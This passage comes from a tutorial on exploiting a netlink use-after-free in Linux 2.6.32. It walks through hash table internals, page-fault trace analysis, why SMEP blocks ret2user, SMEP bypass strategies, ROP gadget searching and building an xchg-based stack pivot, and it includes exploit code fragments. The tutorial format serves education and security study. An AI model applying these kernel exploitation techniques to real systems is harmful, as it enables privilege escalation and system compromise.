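enum dilute_action { DILUTE_NONE, DILUTE_GROW, DILUTE_REHASH };

/* Hypothetical, reduced view of struct nl_pid_hash. */
struct toy_hash_state {
    unsigned int entries;
    unsigned int shift;
    unsigned int max_shift;
    int rehash_allowed;   /* models time_after(jiffies, rehash_time) */
};

/* `len` is the number of elements already in the target bucket. */
enum dilute_action dilute_decision(const struct toy_hash_state *h, int len)
{
    int avg = (int)(h->entries >> h->shift);

    /* [1]: load factor >= 2 and the table can still grow */
    if (avg > 1 && h->shift < h->max_shift)
        return DILUTE_GROW;

    /* [2]: bucket more charged than average, rate-limited rehash */
    if (len > avg && h->rehash_allowed)
        return DILUTE_REHASH;

    return DILUTE_NONE;
}
```

Remember that netlink_insert() only calls the dilute function when len is not zero, so inserting into an empty bucket never triggers any of this.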

Netlink "Rehashing"

In order to finish our understanding of the netlink hash table insertion, let's quickly review nl_pid_hash_rehash():

static int nl_pid_hash_rehash(struct nl_pid_hash *hash, int grow)

{

unsigned int omask, mask, shift;

size_t osize, size;

struct hlist_head *otable, *table;

int i;

omask = mask = hash->mask;

osize = size = (mask + 1) * sizeof(*table);

shift = hash->shift;

if (grow) {

if (++shift > hash->max_shift)

return 0;

mask = mask * 2 + 1;

size *= 2;

}

table = nl_pid_hash_zalloc(size);

if (!table)

return 0;

otable = hash->table;

hash->table = table;

hash->mask = mask;

hash->shift = shift;

get_random_bytes(&hash->rnd, sizeof(hash->rnd));

for (i = 0; i <= omask; i++) {

struct sock *sk;

struct hlist_node *node, *tmp;

sk_for_each_safe(sk, node, tmp, &otable[i])

__sk_add_node(sk, nl_pid_hashfn(hash, nlk_sk(sk)->pid));

}

nl_pid_hash_free(otable, osize);

hash->rehash_time = jiffies + 10 * 60 * HZ;

return 1;

}

This function:

- computes a new size and mask depending on the grow parameter. The number of buckets is multiplied by two at each growing operation

- allocates a new array of hlist_head (i.e. new buckets)

- updates the rnd value of the hash table. From this point on, the old bucket assignment is invalid because the hash function would no longer find the previous elements

- walks the previous buckets and re-inserts all elements into the new buckets using the new hash function

- releases the previous bucket array and updates the rehash_time.

Since the hash function has changed, the "new bucket" must be recomputed after a dilution prior to inserting the element (in netlink_insert()).
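The growing arithmetic is worth isolating. The sketch below (structure and function names are ours) only reproduces the mask/shift bookkeeping of the grow path of nl_pid_hash_rehash(), without any allocation or re-insertion.

```c
/* Hypothetical, reduced view of struct nl_pid_hash. */
struct toy_table {
    unsigned int mask;
    unsigned int shift;
    unsigned int max_shift;
};

/* Returns 1 when the table grew, 0 when max_shift was already reached
 * (same outcome as the "++shift > hash->max_shift" test). */
int toy_grow(struct toy_table *t)
{
    if (t->shift + 1 > t->max_shift)
        return 0;

    t->shift++;
    t->mask = t->mask * 2 + 1;   /* 0 -> 1 -> 3 -> 7 -> ... */
    return 1;
}

/* Number of buckets, always equal to 2^shift. */
unsigned int toy_buckets(const struct toy_table *t)
{
    return t->mask + 1;
}
```

Starting from a single bucket (mask and shift equal to zero), three successful grows lead to a mask of 7, that is 8 buckets.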

Netlink Hash Table Summary

Let's sum up what we know about netlink hash table insertion so far:

- netlink has one hash table per protocol

- each hash table starts with a single bucket

- there are on average two elements per bucket

- the table grows when there are (roughly) more than two elements per bucket

- every time a hash table grows, its number of buckets is multiplied by two

- when the hash table grows, its elements are "diluted"

- inserting an element into a bucket that is "more charged" than the others provokes a dilution

- elements are always inserted at the head of a bucket

- when a dilution occurs, the hash function changes

- the hash function uses a user-provided pid value and another unpredictable key

- the hash function is supposed to be irreversible so we can't choose into which bucket an element will be inserted

- any operation on ANY hash table is protected by a global lock (netlink_table_grab() and netlink_table_ungrab())

And some additional elements about removal (check netlink_remove()):

- once grown, a hash table is never shrunk

- a removal never provokes a dilution

ALRIGHT! We are ready to move on and get back to our exploit!



Meeting Supervisor Mode Execution Prevention

In the previous article, we modified the PoC to exploit the use-after-free through type confusion [1]. With the reallocation we made the "fake" netlink sock's wait queue pointing to an element in userland [2].

Then, the setsockopt() syscall [3a] iterates over our userland wait queue element and calls the func function pointer [3b] that is panic() [3c] right now. This gave us a nice call trace to validate that we successfully achieved an arbitrary call.

The call trace was something like:

[ 213.352742] Freeing alive netlink socket ffff88001bddb400

[ 218.355229] Kernel panic - not syncing: ^A

[ 218.355434] Pid: 2443, comm: exploit Not tainted 2.6.32

[ 218.355583] Call Trace:

[ 218.355689] [<ffffffff8155372b>] ? panic+0xa7/0x179

[ 218.355927] [<ffffffff810665b3>] ? __wake_up+0x53/0x70

[ 218.356045] [<ffffffff81061909>] ? __wake_up_common+0x59/0x90

[ 218.356156] [<ffffffff810665a8>] ? __wake_up+0x48/0x70

[ 218.356310] [<ffffffff814b81cc>] ? netlink_setsockopt+0x13c/0x1c0

[ 218.356460] [<ffffffff81475a2f>] ? sys_setsockopt+0x6f/0xc0

[ 218.356622] [<ffffffff8100b1a2>] ? system_call_fastpath+0x16/0x1b

As we can see panic() is indeed called from the curr->func() function pointer in __wake_up_common().

NOTE: the second call to __wake_up() does not occur. It appears here because the arguments of panic() are a bit broken.

Returning to userland code (first try)

Alright, now let's try to return into userland (some call it ret-to-user).

One might ask: why return into userland code? Unless your kernel is backdoored, it is unlikely that you will find a single function that directly elevates your privileges, repairs the kernel, etc. We want to execute arbitrary code of our choice. Since we have an arbitrary call primitive, let's write our payload in the exploit and jump to it.

Let's modify the exploit and build a payload() function that in turn will call panic() (for testing purposes). Remember to change the func function pointer value:

static int payload(void);

static int init_realloc_data(void)

{

// ... cut ...

// initialise the userland wait queue element

BUILD_BUG_ON(offsetof(struct wait_queue, func) != WQ_ELMT_FUNC_OFFSET);

BUILD_BUG_ON(offsetof(struct wait_queue, task_list) != WQ_ELMT_TASK_LIST_OFFSET);

g_uland_wq_elt.flags = WQ_FLAG_EXCLUSIVE; // set to exit after the first arbitrary call

g_uland_wq_elt.private = NULL; // unused

g_uland_wq_elt.func = (wait_queue_func_t) &payload; // <----- userland addr instead of PANIC_ADDR

g_uland_wq_elt.task_list.next = (struct list_head*)&g_fake_next_elt;

g_uland_wq_elt.task_list.prev = (struct list_head*)&g_fake_next_elt;

printf("[+] g_uland_wq_elt addr = %p\n", &g_uland_wq_elt);

printf("[+] g_uland_wq_elt.func = %p\n", g_uland_wq_elt.func);

return 0;

}

typedef void (*panic)(const char *fmt, ...);

// The following code is executed in Kernel Mode.

static int payload(void)

{

((panic)(PANIC_ADDR))(""); // called from kernel land

// must be non-zero to exit the list_for_each_entry_safe() loop

return 555;

}



The previous diagram becomes:

Try to launch it, and...

[ 124.962677] BUG: unable to handle kernel paging request at 00000000004014c4

[ 124.962923] IP: [<00000000004014c4>] 0x4014c4

[ 124.963039] PGD 1e3df067 PUD 1abb6067 PMD 1b1e6067 PTE 111e3025

[ 124.963261] Oops: 0011 [#1] SMP

...

[ 124.966733] RIP: 0010:[<00000000004014c4>] [<00000000004014c4>] 0x4014c4

[ 124.966810] RSP: 0018:ffff88001b533e60 EFLAGS: 00010012

[ 124.966851] RAX: 0000000000602880 RBX: 0000000000602898 RCX: 0000000000000000

[ 124.966900] RDX: 0000000000000000 RSI: 0000000000000001 RDI: 0000000000602880

[ 124.966948] RBP: ffff88001b533ea8 R08: 0000000000000000 R09: 00007f919c472700

[ 124.966995] R10: 00007ffd8d9393f0 R11: 0000000000000202 R12: 0000000000000001

[ 124.967043] R13: ffff88001bdf2ab8 R14: 0000000000000000 R15: 0000000000000000

[ 124.967090] FS: 00007f919cc3c700(0000) GS:ffff880003200000(0000) knlGS:0000000000000000

[ 124.967141] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033

[ 124.967186] CR2: 00000000004014c4 CR3: 000000001d01a000 CR4: 00000000001407f0

[ 124.967264] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000

[ 124.967334] DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400

[ 124.967385] Process exploit (pid: 2447, threadinfo ffff88001b530000, task ffff88001b4cd280)

[ 124.968804] Stack:

[ 124.969510] ffffffff81061909 ffff88001b533e78 0000000100000001 ffff88001b533ee8

[ 124.969629] <d> ffff88001bdf2ab0 0000000000000286 0000000000000001 0000000000000001

[ 124.970492] <d> 0000000000000000 ffff88001b533ee8 ffffffff810665a8 0000000100000000

[ 124.972289] Call Trace:

[ 124.973034] [<ffffffff81061909>] ? __wake_up_common+0x59/0x90

[ 124.973898] [<ffffffff810665a8>] __wake_up+0x48/0x70

[ 124.975251] [<ffffffff814b81cc>] netlink_setsockopt+0x13c/0x1c0

[ 124.976069] [<ffffffff81475a2f>] sys_setsockopt+0x6f/0xc0

[ 124.976721] [<ffffffff8100b1a2>] system_call_fastpath+0x16/0x1b

[ 124.977382] Code: Bad RIP value.

[ 124.978107] RIP [<00000000004014c4>] 0x4014c4

[ 124.978770] RSP <ffff88001b533e60>

[ 124.979369] CR2: 00000000004014c4

[ 124.979994] Tainting kernel with flag 0x7

[ 124.980573] Pid: 2447, comm: exploit Not tainted 2.6.32

[ 124.981147] Call Trace:

[ 124.981720] [<ffffffff81083291>] ? add_taint+0x71/0x80

[ 124.982289] [<ffffffff81558dd4>] ? oops_end+0x54/0x100

[ 124.982904] [<ffffffff810527ab>] ? no_context+0xfb/0x260

[ 124.983375] [<ffffffff81052a25>] ? __bad_area_nosemaphore+0x115/0x1e0

[ 124.983994] [<ffffffff81052bbe>] ? bad_area_access_error+0x4e/0x60

[ 124.984445] [<ffffffff81053172>] ? __do_page_fault+0x282/0x500

[ 124.985055] [<ffffffff8106d432>] ? default_wake_function+0x12/0x20

[ 124.985476] [<ffffffff81061909>] ? __wake_up_common+0x59/0x90

[ 124.986020] [<ffffffff810665b3>] ? __wake_up+0x53/0x70

[ 124.986449] [<ffffffff8155adae>] ? do_page_fault+0x3e/0xa0

[ 124.986957] [<ffffffff81558055>] ? page_fault+0x25/0x30 // <------

[ 124.987366] [<ffffffff81061909>] ? __wake_up_common+0x59/0x90

[ 124.987892] [<ffffffff810665a8>] ? __wake_up+0x48/0x70

[ 124.988295] [<ffffffff814b81cc>] ? netlink_setsockopt+0x13c/0x1c0

[ 124.988781] [<ffffffff81475a2f>] ? sys_setsockopt+0x6f/0xc0

[ 124.989231] [<ffffffff8100b1a2>] ? system_call_fastpath+0x16/0x1b

[ 124.990091] ---[ end trace 2c697770b8aa7d76 ]---

Oops! As we can see in the call trace, it didn't quite hit the mark (step 3 failed)! We will meet this kind of trace quite a lot, so we had better understand how to read it.

Understanding Page Fault Trace



Let's analyze the previous trace. This kind of trace comes from a page fault exception. That is, an exception generated by the CPU itself (i.e. hardware) while trying to access memory.

Under "normal" circumstances, a page fault exception can occur when:

- the CPU tries to access a page that is not present in RAM (legal access)

- the access is "illegal": writing to read-only page, executing NX page, address does not belong to a virtual memory area (VMA), etc.

While being an "exception" CPU-wise, this actually occurs quite often during normal program life cycle. For instance, when you allocate memory with mmap(), the kernel does not allocate physical memory until you access it the very first time. This is called Demand Paging. This first access provokes a page fault, and it is the page fault exception handler that actually allocates a page frame. That's why you can virtually allocate more memory than the actual physical RAM (until you access it).

The following diagram (from Understanding the Linux Kernel) shows a simplified version of the page fault exception handler:

As we can see, if an illegal access occurs while being in Kernel Land, it can crash the kernel. This is where we are right now.

[ 124.962677] BUG: unable to handle kernel paging request at 00000000004014c4

[ 124.962923] IP: [<00000000004014c4>] 0x4014c4

[ 124.963039] PGD 1e3df067 PUD 1abb6067 PMD 1b1e6067 PTE 111e3025

[ 124.963261] Oops: 0011 [#1] SMP

...

[ 124.979369] CR2: 00000000004014c4

The previous trace has a lot of information explaining the reason for the page fault exception. The CR2 register (same as IP here) holds the faulty address.

In our case, the MMU (hardware) failed to access memory address 0x00000000004014c4 (the payload() address). Because IP also points to it, we know that the exception is generated while trying to execute the curr->func() call in __wake_up_common().

First, let's focus on the error code which is "0x11" in our case. The error code is a 64-bit value where the following bits can be set/clear:

// [arch/x86/mm/fault.c]

/*

* Page fault error code bits:

*

* bit 0 == 0: no page found 1: protection fault

* bit 1 == 0: read access 1: write access

* bit 2 == 0: kernel-mode access 1: user-mode access

* bit 3 == 1: use of reserved bit detected

* bit 4 == 1: fault was an instruction fetch

*/

enum x86_pf_error_code {

PF_PROT = 1 << 0,

PF_WRITE = 1 << 1,

PF_USER = 1 << 2,

PF_RSVD = 1 << 3,

PF_INSTR = 1 << 4,

};

That is, our error_code is:

((PF_PROT | PF_INSTR) & ~PF_WRITE) & ~PF_USER

In other words, the page fault occurs:

- because of a protection fault (PF_PROT is set)

- during an instruction fetch (PF_INSTR is set)

- implying a read access (PF_WRITE is clear)

- in kernel-mode (PF_USER is clear)

Since the page to which the faulty address belongs is present (PF_PROT is set), a Page Table Entry (PTE) exists. The latter describes two things:

- Page Frame Number (PFN)

- Page Flags like access rights, page is present status, User/Supervisor page, etc.

In our case, the PTE value is 0x111e3025:

[ 124.963039] PGD 1e3df067 PUD 1abb6067 PMD 1b1e6067 PTE 111e3025

If we mask out the PFN part of this value, we get 0b100101 (0x25). Let's code a basic program to extract information from the PTE's flags value:

#include <stdio.h>

#define __PHYSICAL_MASK_SHIFT 46

#define __PHYSICAL_MASK ((1ULL << __PHYSICAL_MASK_SHIFT) - 1)

#define PAGE_SIZE 4096ULL

#define PAGE_MASK (~(PAGE_SIZE - 1))

#define PHYSICAL_PAGE_MASK (((signed long)PAGE_MASK) & __PHYSICAL_MASK)

#define PTE_FLAGS_MASK (~PHYSICAL_PAGE_MASK)

int main(void)

{

unsigned long long pte = 0x111e3025;

unsigned long long pte_flags = pte & PTE_FLAGS_MASK;

printf("PTE_FLAGS_MASK = 0x%llx\n", PTE_FLAGS_MASK);

printf("pte = 0x%llx\n", pte);

printf("pte_flags = 0x%llx\n\n", pte_flags);

printf("present = %d\n", !!(pte_flags & (1 << 0)));

printf("writable = %d\n", !!(pte_flags & (1 << 1)));

printf("user = %d\n", !!(pte_flags & (1 << 2)));

printf("accessed = %d\n", !!(pte_flags & (1 << 5)));

printf("NX = %d\n", !!(pte_flags & (1ULL << 63)));

return 0;

}

NOTE: If you wonder where all those constants come from, search for the PTE_FLAGS_MASK and _PAGE_BIT_USER macros in arch/x86/include/asm/pgtable_types.h. It simply matches the Intel documentation (Table 4-19).

This program gives:

PTE_FLAGS_MASK = 0xffffc00000000fff

pte = 0x111e3025

pte_flags = 0x25

present = 1

writable = 0

user = 1

accessed = 1

NX = 0

Let's match this information with the previous error code:

- The page the kernel is trying to access is already present, so the fault comes from an access right issue

- We are NOT trying to write to a read-only page

- The NX bit is NOT set, so the page is executable

- The page is user accessible which means, the kernel can also access it

So, what's wrong?

In the previous list, the fourth point is only partially true. The kernel has the right to access User Mode pages but it cannot execute them! The reason being:

Supervisor Mode Execution Prevention (SMEP).

Prior to the introduction of SMEP, the kernel had all rights to do anything with userland pages. In Supervisor Mode (i.e. Kernel Mode), the kernel was allowed to read, write and execute both userland AND kernel pages. This is not true anymore!

SMEP has existed since the "Ivy Bridge" Intel microarchitecture (Core i7, Core i5, etc.) and the Linux kernel has supported it since this patch. It adds a security mechanism that is enforced in hardware.

Let's look at the section "4.6.1 - Determination of Access Rights" from Intel System Programming Guide Volume 3a which gives the complete sequence performed while checking if accessing a memory location is allowed or not. If not, a page fault exception is generated.

Since the fault occurs during the setsockopt() system call, we are in supervisor-mode:

The following items detail how paging determines access rights:

• For supervisor-mode accesses:

... cut ...

— Instruction fetches from user-mode addresses.

Access rights depend on the values of CR4.SMEP:

• If CR4.SMEP = 0, access rights depend on the paging mode and the value of IA32_EFER.NXE:

... cut ...

• If CR4.SMEP = 1, instructions may not be fetched from any user-mode address.



Let's check the status of the CR4 register. The bit in CR4 which represents the SMEP status is the bit 20:

In Linux, the following macro is used:

// [arch/x86/include/asm/processor-flags.h]

#define X86_CR4_SMEP 0x00100000 /* enable SMEP support */

Hence:

CR4 = 0x00000000001407f0

                  ^

                  +------ SMEP is enabled

That's it! SMEP is simply doing its job: preventing us from returning into userland code from kernel land.

Fortunately, SMAP (Supervisor Mode Access Prevention), which forbids access to userland pages from Kernel Mode, is disabled. It would force us to use another exploitation strategy (i.e. we couldn't use a wait queue element in userland).

WARNING: Some virtualization software (like VirtualBox) did not support SMEP when we tested it, and we don't know whether it does at the time of writing. If the SMEP flag is not enabled in your lab, you might consider using other virtualization software (hint: VMware supports it).

In this section, we analyzed in deeper detail what information can be extracted from a page fault trace. It is important to understand it as we might need to explore it again later on (e.g. prefaulting). In addition, we understood why the exception was generated because of SMEP and how to detect it. Don't worry, like any security protection mechanism, there is a workaround :-).

Defeating SMEP Strategies

In the previous section, we tried to jump into userland code to execute the payload of our choice (i.e. arbitrary code execution). Unfortunately, we've been blocked by SMEP which provoked an unrecoverable page fault making the kernel crash.

In this section, we will present different strategies that can be used to defeat SMEP.

Don't ret2user

The most obvious way to bypass SMEP is to not return to user code at all and keep executing kernel code.

However, it is very unlikely that we find a single function in the kernel that:

- elevates our privileges and/or other "profits"

- repairs the kernel

- returns a non-zero value (required by the bug)

Note that in the current exploit, we are not actually bound to a "single function". The reason is that we control the func field since it is located in userland. What we could do here is call one kernel function, modify func, call another function, etc. However, this brings two issues:

- We can't have the return value of the invoked function

- We do not "directly" control the invoked function parameters

There are tricks to exploit the arbitrary call this way, which avoid the need for any ROP and allow a more "targetless" exploit. Those are off-topic here as we want to present a "common" way to use arbitrary calls.

Just like in userland exploitation, we can use the return-oriented programming (ROP) technique. The problem is that writing a complex ROP-chain can be tedious (yet automatable). This will work nevertheless. Which leads us to...

Disabling SMEP

As we've seen in the previous section, the status of SMEP (CR4.SMEP) is checked during a memory access. More specifically, when the CPU fetches an instruction belonging to userspace while in Kernel (Supervisor) mode. If we can flip this bit in CR4, we will be able to ret2user again.

This is what we will do in the exploit. First, we disable the SMEP bit using ROP, and then jump to user code. This will allow us to write our payload in C language.

ret2dir

The ret2dir attack exploits the fact that every user page has an equivalent address in kernel-land (called "synonyms"). Those synonyms are located in the physmap. The physmap is a direct mapping of all physical memory. The virtual address of the physmap is 0xffff880000000000 which maps the page frame number (PFN) zero (0xffff880000001000 is PFN#1, etc.). The term "physmap" seems to have appeared with the ret2dir attack, some people call it "linear mapping".

Alas, it is more complex to do it nowadays because /proc/<PID>/pagemap is not world readable anymore. It used to allow finding the PFN of a userland page, and hence its virtual address in the physmap.

The PFN of a userland address uaddr can be retrieved by seeking into the pagemap file and reading an 8-byte value at the following offset (the PFN is stored in the low bits, 0 to 54, of that value):

offset(uaddr) = (uaddr/4096) * sizeof(void*)

If you want to know more about this attack, see ret2dir: Rethinking Kernel Isolation.

Overwriting Paging-Structure Entries

If we look again at the Determination of Access Rights (4.6.1) section in the Intel documentation, we get:

Access rights are also controlled by the mode of a linear address as specified by

the paging-structure entries controlling the translation of the linear address.

If the U/S flag (bit 2) is 0 in at least one of the paging-structure entries, the

address is a supervisor-mode address. Otherwise, the address is a user-mode address.

The address we are trying to jump to is considered as a user-mode address since the U/S flag is set.

One way to bypass SMEP is to overwrite at least one paging-structure entry (PTE, PMD, etc.) and clear bit 2. It implies that we know where this PGD/PUD/PMD/PTE is located in memory. This kind of attack is easier to do with arbitrary read/write primitives.



Finding Gadgets

Finding ROP gadgets in Kernel is similar to userland exploitation. First we need the vmlinux binary and (optionally) the System.map files that we already extracted in part 3. Since vmlinux is an ELF binary, we can use ROPgadget.

However, vmlinux is not a typical ELF binary. It embeds special sections. If you look at the various sections using readelf you can see that there are a lot of them:

$ readelf -l vmlinux-2.6.32

Elf file type is EXEC (Executable file)

Entry point 0x1000000

There are 6 program headers, starting at offset 64

Program Headers:

Type Offset VirtAddr PhysAddr

FileSiz MemSiz Flags Align

LOAD 0x0000000000200000 0xffffffff81000000 0x0000000001000000

0x0000000000884000 0x0000000000884000 R E 200000

LOAD 0x0000000000c00000 0xffffffff81a00000 0x0000000001a00000

0x0000000000225bd0 0x0000000000225bd0 RWE 200000

LOAD 0x0000000001000000 0xffffffffff600000 0x0000000001c26000

0x00000000000008d8 0x00000000000008d8 R E 200000

LOAD 0x0000000001200000 0x0000000000000000 0x0000000001c27000

0x000000000001ff58 0x000000000001ff58 RW 200000

LOAD 0x0000000001247000 0xffffffff81c47000 0x0000000001c47000

0x0000000000144000 0x0000000000835000 RWE 200000

NOTE 0x0000000000760f14 0xffffffff81560f14 0x0000000001560f14

0x000000000000017c 0x000000000000017c 4

Section to Segment mapping:

Segment Sections...

00 .text .notes __ex_table .rodata __bug_table .pci_fixup __ksymtab __ksymtab_gpl __kcrctab __kcrctab_gpl __ksymtab_strings __init_rodata __param __modver

01 .data

02 .vsyscall_0 .vsyscall_fn .vsyscall_gtod_data .vsyscall_1 .vsyscall_2 .vgetcpu_mode .jiffies .fence_wdog_jiffies64

03 .data.percpu

04 .init.text .init.data .x86_cpu_dev.init .parainstructions .altinstructions .altinstr_replacement .exit.text .smp_locks .data_nosave .bss .brk

05 .notes

In particular, it has a .init.text section which seems executable (use the -t modifier):

[25] .init.text

PROGBITS PROGBITS ffffffff81c47000 0000000001247000 0

000000000004904a 0000000000000000 0 16

[0000000000000006]: ALLOC, EXEC

This section holds code that is only used during the boot process. Code belonging to this section is marked with the __init preprocessor macro defined here:

#define __init __section(.init.text) __cold notrace

For instance:

// [mm/slab.c]

/*

* Initialisation. Called after the page allocator have been initialised and

* before smp_init().

*/

void __init kmem_cache_init(void)

{

// ... cut ...

}

Once the initialization phase is complete, this code is unmapped from memory. In other words, using a gadget belonging to this section will result in a page fault in kernel land, making it crash (cf. previous section).

Because of this (other special executable sections have other traps), we will avoid searching for gadgets in those "special sections" and limit the search to the ".text" section only. The start and end addresses can be found with the _text and _etext symbols:

$ egrep " _text$| _etext$" System.map-2.6.32

ffffffff81000000 T _text

ffffffff81560f11 T _etext

Or with readelf (-t modifier):

[ 1] .text

PROGBITS PROGBITS ffffffff81000000 0000000000200000 0

0000000000560f11 0000000000000000 0 4096

[0000000000000006]: ALLOC, EXEC

Let's extract all gadgets with:

$ ./ROPgadget.py --binary vmlinux-2.6.32 --range 0xffffffff81000000-0xffffffff81560f11 | sort > ranged_gadget.lst.sorted

WARNING: Gadgets from [_text; _etext[ aren't 100% guaranteed to be valid at runtime for various reasons. You should inspect memory before executing the ROP-chain (cf. "Debugging the kernel with GDB").

Alright, we are ready to ROP.

Stack Pivoting

In the previous sections we saw that:

- the kernel crashes (page fault) while trying to jump to user-land code because of SMEP

- SMEP can be disabled by flipping a bit in CR4

- we can only use gadgets in the .text section and extract them with ROPgadget

In the "Core Concepts #4" section, we saw that while executing syscall code, the kernel stack pointer (rsp) points into the current kernel thread stack. In this section, we will use our arbitrary call primitive to pivot the stack to a userland one. Doing so will allow us to control a "fake" stack and execute the ROP-chain of our choice.

Analyze Attacker-Controlled Data

The __wake_up_common() function has been analyzed in detail in part 3. As a reminder, the code is:

static void __wake_up_common(wait_queue_head_t *q, unsigned int mode,

int nr_exclusive, int wake_flags, void *key)

{

wait_queue_t *curr, *next;

list_for_each_entry_safe(curr, next, &q->task_list, task_list) {

unsigned flags = curr->flags;

if (curr->func(curr, mode, wake_flags, key) &&

(flags & WQ_FLAG_EXCLUSIVE) && !--nr_exclusive)

break;

}

}

Which is invoked with (we almost fully control the content of nlk with reallocation):

__wake_up_common(&nlk->wait, TASK_INTERRUPTIBLE, 1, 0, NULL)

In particular, our arbitrary call primitive is invoked here:

ffffffff810618f7: 44 8b 20 mov r12d,DWORD PTR [rax] // "flags = curr->flags"

ffffffff810618fa: 4c 89 f1 mov rcx,r14 // 4th arg: "key"

ffffffff810618fd: 44 89 fa mov edx,r15d // 3rd arg: "wake_flags"

ffffffff81061900: 8b 75 cc mov esi,DWORD PTR [rbp-0x34] // 2nd arg: "mode"

ffffffff81061903: 48 89 c7 mov rdi,rax // 1st arg: "curr"

ffffffff81061906: ff 50 10 call QWORD PTR [rax+0x10] // ARBITRARY CALL PRIMITIVE

Let's relaunch the exploit:

...

[+] g_uland_wq_elt addr = 0x602860

[+] g_uland_wq_elt.func = 0x4014c4

...

The register status when crashing is:

[ 453.993810] RIP: 0010:[<00000000004014c4>] [<00000000004014c4>] 0x4014c4

                          ^ &payload()

[ 453.993932] RSP: 0018:ffff88001b527e60 EFLAGS: 00010016

                        ^ kernel thread stack top

[ 453.994003] RAX: 0000000000602860 RBX: 0000000000602878 RCX: 0000000000000000

                   ^ curr                ^ &task_list.next     ^ "key" arg

[ 453.994086] RDX: 0000000000000000 RSI: 0000000000000001 RDI: 0000000000602860

                   ^ "wake_flags" arg    ^ "mode" arg          ^ curr

[ 453.994199] RBP: ffff88001b527ea8 R08: 0000000000000000 R09: 00007fc0fa180700

                   ^ thread stack base   ^ "key" arg           ^ ???

[ 453.994275] R10: 00007fffa3c8b860 R11: 0000000000000202 R12: 0000000000000001

                   ^ ???                 ^ ???                 ^ curr->flags

[ 453.994356] R13: ffff88001bdde6b8 R14: 0000000000000000 R15: 0000000000000000

                   ^ nlk->wq [REALLOC]   ^ "key" arg           ^ "wake_flags" arg

Wow... It seems we are really lucky! rax, rbx and rdi all point into our userland wait queue element. Of course, this is not fortuitous. It is another reason why we chose this arbitrary call primitive in the first place.

The Pivot

Remember the stack is only defined by the rsp register. Let's use one of our controlled registers to overwrite it. A common gadget used in this kind of situation is:

xchg rsp, rXX ; ret

It exchanges the value of rsp with a controlled register, so the previous rsp value is saved in that register. Hence, it helps to restore the stack pointer afterward.

NOTE: You might use a mov gadget instead but you will lose the current stack pointer value, hence not be able to repair the stack afterward. This is not exactly true... You can repair it by using RBP or the kernel_stack variable (cf. Core Concepts #4) and add a "fixed offset" since the stack layout is known and deterministic. The xchg instruction just makes things simpler.

$ egrep "xchg [^;]*, rsp|xchg rsp, " ranged_gadget.lst.sorted

0xffffffff8144ec62 : xchg rsi, rsp ; dec ecx ; cdqe ; ret

Looks like we only have one gadget that does this in our kernel image. In addition, the rsi value is 0x0000000000000001 (and we can't control it). Using this gadget would therefore require mapping a page at address zero, which is no longer possible: this restriction exists precisely to prevent the exploitation of "NULL-deref" bugs.

Let's extend the search to the "esp" register, which brings many more results:

$ egrep "(: xchg [^;]*, esp|: xchg esp, ).*ret$" ranged_gadget.lst.sorted

...

0xffffffff8107b6b8 : xchg eax, esp ; ret

...

However, the xchg instruction here works on 32-bit registers. That is, the 32 most significant bits will be zeroed!

If you are not convinced yet, just run (and debug) the following program:

# Build-and-debug with: as test.S -o test.o; ld test.o; gdb ./a.out

.text

.global _start

_start:

mov $0x1aabbccdd, %rax

mov $0xffff8000deadbeef, %rbx

xchg %eax, %ebx # <---- check "rax" and "rbx" past this instruction (gdb)

That is, after executing the stack pivot gadget, the 64-bit registers become:

- rax = 0xffff88001b527e60 & 0x00000000ffffffff = 0x000000001b527e60

- rsp = 0x0000000000602860 & 0x00000000ffffffff = 0x0000000000602860

This is actually not a problem because of the virtual address mapping where userland address ranges from 0x0 to 0x00007ffffffff000 (cf. Core Concept #4). In other words, any 0x00000000XXXXXXXX address is a valid userland one.

The stack is now pointing to userland, where we control the data and can start our ROP-chain. The register states before and after executing the stack pivot gadget are:

ERRATA: RSP actually points 8 bytes after RDI since the ret instruction "pops" a value before jumping to it (i.e. RSP should point to private). Please see the next section.

NOTE: rax now points to a "random" userland address since it only holds the 32 least significant bits of the previous rsp value.

Dealing with Aliasing

Before going further there are few things to consider:

- the new "fake" stack is now aliasing with the wait queue element object (in userland).

- since the 32 most significant bits are zeroed, the fake stack must be mapped at an address lower than 0x100000000.

Right now, the g_uland_wq_elt is declared globally (i.e. the bss). Its address is "0x602860" which is lower than 0x100000000.

Aliasing can be an issue as it:

- forces us to use a stack lifting gadget to "jump over" the func gadget (i.e. don't execute the "stack pivot" gadget again)

- imposes constraints on the gadgets as the wait queue element must still be valid (in __wake_up_common())

There are two ways to deal with this "aliasing" issue:

- Keep the fake stack and wait queue aliased and use a stack lifting with constrained gadgets

- Move g_uland_wq_elt into "higher" memory (after the 0x100000000 mark).

Both techniques work.

For instance, if you want to implement the first way (we won't), the next gadget address must have its least significant bit set because of the break condition in __wake_up_common():

(flags & WQ_FLAG_EXCLUSIVE) // WQ_FLAG_EXCLUSIVE == 1

In this particular example, this first condition can easily be overcome by using a NOP gadget which has its least significant bit set:

0xffffffff8100ae3d : nop ; nop ; nop ; ret // <---- valid gadget

0xffffffff8100ae3e : nop ; nop ; ret // <---- BAD GADGET

Instead, we will implement the second as we think it is more "interesting", less gadget-dependent and exposes a technique that is sometimes used in exploits (having addresses relative to each other). In addition, we will have more choices for our ROP-chain gadgets as they will no longer be constrained by the aliasing.

In order to place our (userland) wait queue element at an arbitrary location, we will use the mmap() syscall with the MAP_FIXED flag. We will do the same for the "fake stack". Both are linked by the following property:

ULAND_WQ_ADDR = FAKE_STACK_ADDR + 0x100000000

In other words:

(ULAND_WQ_ADDR & 0xffffffff) == FAKE_STACK_ADDR

 ^ pointed by RAX before XCHG   ^ pointed by RSP after XCHG

This is implemented in allocate_uland_structs():

static int allocate_uland_structs(void)

{

// arbitrary value, must not collide with already mapped memory (/proc/<PID>/maps)

void *starting_addr = (void*) 0x20000000;

// ... cut ...

g_fake_stack = (char*) _mmap(starting_addr, 4096, PROT_READ|PROT_WRITE,

MAP_FIXED|MAP_SHARED|MAP_ANONYMOUS|MAP_LOCKED|MAP_POPULATE, -1, 0);

// ... cut ...

g_uland_wq_elt = (struct wait_queue*) _mmap(g_fake_stack + 0x100000000, 4096, PROT_READ|PROT_WRITE,

MAP_FIXED|MAP_SHARED|MAP_ANONYMOUS|MAP_LOCKED|MAP_POPULATE, -1, 0);

// ... cut ...

}

WARNING: Using MAP_FIXED might "overlap" existing memory! For a better implementation, we should check that the starting_addr address is not already used (e.g. check /proc/<PID>/maps)! Look at the mmap() syscall implementation, you will learn a lot. This is a great exercise.



That is, after executing the "stack pivot gadget", our exploit memory layout will be:

